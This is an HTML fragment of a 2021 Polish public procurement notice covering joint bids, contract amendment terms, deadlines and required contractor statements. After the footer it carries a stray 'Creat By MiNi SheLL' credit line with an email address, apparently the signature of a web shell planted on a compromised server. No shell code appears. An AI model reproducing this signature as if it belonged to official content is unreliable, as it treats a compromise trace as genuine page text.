WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia np. konsorcjum, spółka cywilna, oferta musi spełniać następujące warunki:<br/>1) Oferta winna być podpisana przez każdego partnera lub upoważnionego przedstawiciela (partnera wiodącego lub wspólnika);<br/>2) Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Do oferty musi być dołączone pełnomocnictwo do pełnienia funkcji przedstawiciela (partnera wiodącego), które wymaga podpisu prawnie upoważnionych przedstawicieli każdego z partnerów pełnomocnictwo w oryginale lub urzędowo potwierdzonego odpisu;<br/>3) Podmioty występujące wspólnie ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy.<br/>4) Wypełniony formularz ofertowy, jak również i inne dokumenty powołujące się na „Wykonawcę”, w miejscu np. ”nazwa i adres Wykonawcy” należy wpisać dane dotyczące Wykonawców ubiegających się wspólnie o udzielenie zamówienia, a nie dane pełnomocnika.<br/>5) Wszelka korespondencja będzie prowadzona z przedstawicielem/wiodącym partnerem.<br/>6) Wszelkie zawarte w SWZ warunki i wymagania dotyczące Wykonawcy, stosuje się odpowiednio do Wykonawców występujących wspólnie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiana nieistotnych postanowień zawartej umowy w stosunku do treści oferty, na podstawie<br/>której dokonano wyboru wykonawcy może nastąpić wyłącznie za zgodą obustronną wyrażoną<br/>na piśmie pod rygorem nieważności.2. Zamawiający przewiduje możliwość dokonania zmian<br/>postanowień umowy zawartej z wybranym Wykonawcą w następujących przypadkach:a) gdy nie<br/>można było przewidzieć w chwili zawarcia umowy, Zamawiający dopuszcza możliwość<br/>niezrealizowania pełnego zakresu przedmiotu zamówienia wraz z odpowiednim zmniejszeniem<br/>wynagrodzenia umownego;b) gdy na skutek konieczności wykonania rozszerzenia przedmiotu<br/>zamówienia w stosunku do zamówienia określonego pierwotnie w § 1 ust. 1, wykonanie<br/>dodatkowych usług jest niezbędne dla prawidłowego wykonania oraz zakończenia<br/>podstawowego przedmiotu zamówienia;c) gdy konieczność dokonania zmiany wynika ze zmiany<br/>przepisów prawa Unii Europejskiej lub prawa krajowego powodujących konieczność<br/>dostosowania dokumentacji do zmiany przepisów, które nastąpiły w trakcie realizacji<br/>zamówienia;d) gdy zmiany będą korzystne dla Zamawiającego i nie będą:ia) wprowadzały<br/>warunków, które gdyby zostały ujęte w ramach procedury udzielenia zamówienia umożliwiłyby<br/>dopuszczenie innych ofert niż ta, która została pierwotnie dopuszczona;ib) modyfikowały<br/>równowagi ekonomicznej umowy na korzyść wykonawcy w sposób, który nie był przewidziany w<br/>postanowieniach pierwotnego zamówienia.3. Zakazuje się zmian postanowień zawartej umowy<br/>lub umowy ramowej w stosunku do treści oferty, na podstawie której dokonano wyboru<br/>Wykonawcy, chyba że zachodzi co najmniej jedna z następujących okoliczności:1) zostały<br/>spełnione łącznie następujące warunki:a) konieczność zmiany umowy spowodowana jest<br/>okolicznościami, których zamawiający, działając z należytą starannością, nie mógł<br/>przewidzieć,b) wartość zmiany nie przekracza 30% wartości zamówienia określonej pierwotnie w<br/>umowie;2) Wykonawcę, któremu Zamawiający udzielił zamówienia, ma zastąpić nowy<br/>wykonawca:a) w wyniku połączenia, podziału, przekształcenia, upadłości, restrukturyzacji lub<br/>nabycia dotychczasowego Wykonawcy lub jego przedsiębiorstwa, o ile nowy wykonawca spełnia<br/>warunki udziału w postępowaniu, nie zachodzą wobec niego podstawy wykluczenia oraz nie<br/>pociąga to za sobą innych istotnych zmian umowy,b) w wyniku przejęcia przez Zamawiającego<br/>zobowiązań Wykonawcy względem jego podwykonawców;3) wartość zmian jest mniejsza od 5 % wartości zamówienia określonej pierwotnie w umowie.5. Zmiany postanowień umownych nie<br/>mogą prowadzić do zmiany charakteru umowy.6. Przyczyny dokonania zmian postanowień<br/>umowy oraz uzasadnienie takich zmian należy opisać w stosownych dokumentach (notatka<br/>służbowa, pismo wykonawcy, protokół konieczności - protokół konieczności wymaga<br/>zatwierdzenia przez Zamawiającego). <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-30 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-30 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU (dotyczy wszystkich wykonawców składających oferty.<br/><br/>1). W celu wstępnego potwierdzenia spełnienia warunków, o których mowa w rozdziale II PKT.1 i 2 SWZ wraz z ofertą Wykonawca złoży następujące dokumenty: <br/>- aktualne na dzień składania ofert oświadczenia, że nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu sporządzone na/wg załącznika nr 2 i 3.<br/>2) Oświadczenia, o którym mowa w pkt 1 stanowią dowód potwierdzający brak podstaw wykluczenia, spełnienie warunków udziału w postępowaniu, odpowiednio na dzień składania ofert, stanowią dowód tymczasowo zastępujący wymagane przez zamawiającego podmiotowe środki dowodowe.<br/>3) W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenia o których mowa w pkt 1 składa każdy z wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te mają potwierdzać spełnienie warunków w postępowaniu, brak podstaw wykluczenia w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu , brak podstaw do wykluczenia.<br/>4) Wykonawca, który powołuje się na zasoby innych podmiotów, przedstawia, wraz z oświadczeniami o których mowa w ust. 3, także oświadczenia podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnienie warunków udziału w postępowaniu w zakresie, w jakim wykonawca powołuje się na jego zasoby.<br/>5) Pełnomocnictwo ( jeżeli umocowanie osoby podpisującej złożoną ofertę nie wynika z dokumentów rejestrowych),<br/>6) Pełnomocnictwa dla lidera konsorcjum ( jeżeli oferta składana przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia),<br/>7) Zobowiązanie podmiotu trzeciego do udostępnienia zasobów lub inny dokument potwierdzający, że Wykonawca będzie dysponował niezbędnymi zasobami podmiotu trzeciego ( jeżeli dotyczy),<br/>8) Koncepcja Realizacji Zamówienia ( KRZ),<br/>9) Wykaz osób niezbędny do dokonania oceny wg kryterium nr 2 - ,,Potencjał kadrowy” wg załącznika nr 7 do SWZ,<br/><br/>Zamawiający przed udzieleniem zamówienia wezwie Wykonawcę którego oferta została najwyżej oceniona do złożenia w nie krótszym niż 5 dni terminie aktualnych na dzień złożenia oświadczeń i dokumentów o których mowa w art. 273 ust 1 ustawy.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-19 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com